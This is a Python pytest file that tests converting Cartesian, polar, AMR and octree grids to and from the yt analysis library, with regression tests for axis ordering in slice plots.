class TestToYt(object):
def setup_method(self, method):
# Set up grids
self.grid = {}
self.grid['car'] = CartesianGrid([-1., 1.],
[-2., 0., 2.],
[-3., -1., 1., 3.])
self.grid['cyl'] = CylindricalPolarGrid([0., 1.],
[-1., 0., 1.],
[0., 0.75 * np.pi, 1.25 * np.pi, 2. * np.pi])
self.grid['sph'] = SphericalPolarGrid([0., 0.5, 1.],
[0., np.pi],
[0., 0.75 * np.pi, 1.25 * np.pi, 2. * np.pi])
self.grid['amr'] = AMRGrid()
level = self.grid['amr'].add_level()
grid = level.add_grid()
grid.xmin, grid.xmax = -1., 1.
grid.ymin, grid.ymax = -1., 1.
grid.zmin, grid.zmax = -1., 1.
grid.nx, grid.ny, grid.nz = 8, 6, 4
refined = [1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0]
self.grid['oct'] = OctreeGrid(0., 0., 0., 10., 10., 10.,
np.array(refined).astype(bool))
# Set up initial densities
self.density = {}
self.density['car'] = np.ones((3, 2, 1))
self.density['cyl'] = np.ones((3, 2, 1))
self.density['sph'] = np.ones((3, 1, 2))
amr_q = deepcopy(self.grid['amr'])
amr_q.levels[0].grids[0].quantities['density'] = np.ones((4, 6, 8))
self.density['amr'] = amr_q['density']
self.density['oct'] = np.ones(len(refined))
@pytest.mark.parametrize(('grid_type'), ALL_GRID_TYPES)
def test_to_yt(self, tmpdir, grid_type):
from yt.mods import ProjectionPlot
g = self.grid[grid_type]
g['density'] = []
g['density'].append(self.density[grid_type])
pf = g.to_yt()
# TEMP: xfail due to bug in yt
# https://bitbucket.org/yt_analysis/yt/pull-requests/2362/fix-type-issue-in-octree-construction/diff
if grid_type == 'oct':
pytest.xfail()
p = ProjectionPlot(pf, 'x', ["density"], center='c', origin='native')
p.save(tmpdir.join('test.png').strpath)
@pytest.mark.skipif("YT_VERSION is None or YT_VERSION < 3")
def test_from_yt(tmpdir):
from yt import load
ds = load(os.path.join(DATA, 'DD0010', 'moving7_0010'))
def _dust_density(field, data):
return data["density"].in_units('g/cm**3') * 0.01
ds.add_field(("gas", "dust_density"), function=_dust_density, units='g/cm**3')
amr = AMRGrid.from_yt(ds, quantity_mapping={'density': ('gas', 'dust_density')})
m = Model()
m.set_amr_grid(amr)
m.add_density_grid(amr['density'], get_realistic_test_dust())
s = m.add_point_source()
s.luminosity = 1000
s.temperature = 1000
m.set_n_initial_iterations(3)
m.set_n_photons(initial=1e5, imaging=0)
m.set_propagation_check_frequency(1)
m.set_copy_input(False)
input_file = tmpdir.join('test.rtin').strpath
output_file = tmpdir.join('test.rtout').strpath
m.write(input_file)
m.run(output_file)
@pytest.mark.skipif("YT_VERSION is None")
def test_axis_ordering_cartesian():
# Regression test for axis ordering
from .yt_compat import get_frb
x = np.linspace(-1, 1, 9)
y = np.linspace(-2, 2, 17)
z = np.linspace(-3, 3, 33)
density = np.arange(32)[:, None, None] * np.ones((32, 16, 8))
g = CartesianGrid(x, y, z)
g['density'] = []
g['density'].append(density)
from yt.mods import ProjectionPlot, SlicePlot
pf = g.to_yt()
for iz, z in enumerate(g.z):
prj = SlicePlot(pf, 'z', ['density'], center=[0.0, 0.0, z])
np.testing.assert_allclose(get_frb(prj, 'density').min(), iz)
np.testing.assert_allclose(get_frb(prj, 'density').max(), iz)
@pytest.mark.skipif("YT_VERSION is None")
def test_axis_ordering_amr():
# Regression test for axis ordering
from .yt_compat import get_frb
g = AMRGrid()
level = g.add_level()
grid = level.add_grid()
grid.xmin, grid.xmax = -1, 1
grid.ymin, grid.ymax = -2, 2
grid.zmin, grid.zmax = -3, 3
grid.nx, grid.ny, grid.nz = 8, 16, 32
grid.quantities['density'] = []
grid.quantities['density'].append(np.arange(grid.nz)[:, None, None] * np.ones((grid.nz, grid.ny, grid.nx)))
from yt.mods import ProjectionPlot, SlicePlot
pf = g.to_yt()
zw = np.linspace(-3, 3, 33)
zcen = 0.5 * (zw[1:] + zw[:-1])
for iz, z in enumerate(zcen):
prj = SlicePlot(pf, 'z', ['density'], center=[0.0, 0.0, z])
np.testing.assert_allclose(get_frb(prj, 'density').min(), iz)
np.testing.assert_allclose(get_frb(prj, 'density').max(), iz)
|
python
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.